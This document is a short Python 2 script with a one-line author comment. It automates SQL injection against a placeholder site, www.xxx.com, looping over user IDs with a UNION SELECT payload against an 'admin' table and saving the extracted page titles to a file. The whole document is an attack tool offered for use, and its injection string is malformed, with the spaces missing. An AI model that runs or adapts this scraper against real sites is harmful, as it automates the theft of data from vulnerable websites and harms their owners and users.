- #!/usr/bin/python
- # -*- coding:utf-8 -*-
-
- import urllib2
- import re
- import string
- from sgmllib import SGMLParser
- class getTitle(SGMLParser):
- istitle = 0
- name = []
- def reset(self):
- SGMLParser.reset(self)
- def start_title(self,attrs):
- self.istitle = 1
- def end_title(self):
- self.istitle = 0
- def handle_data(self,data):
- if self.istitle:
- self.name.append(data)
- index=0
- for count in xrange(18680,18690):
- url = "http://www.xxx.com/sqlin.php?id=1and1=1unionselect*fromadmin**/whereuid="+str(count)+"--"
- req = urllib2.Request(url)
- fd = urllib2.urlopen(req)
- text = fd.read(2048)
- if not len(text):
- print "Nothing be getted..."
- else:
- title = getTitle()
- title.feed(text)
- mark=title.name[index].find('-')
- print title.name[index][:mark]+"has been write into result.txt"
- fi=file("result.txt","a")
- fi.writelines(title.name[index][:mark])
- fi.writelines("\n")
- index+=1
-
- fi.close()
Pnig0s:This program is used to get data from a website which have a SQLInjection and write them to files.very smiple.
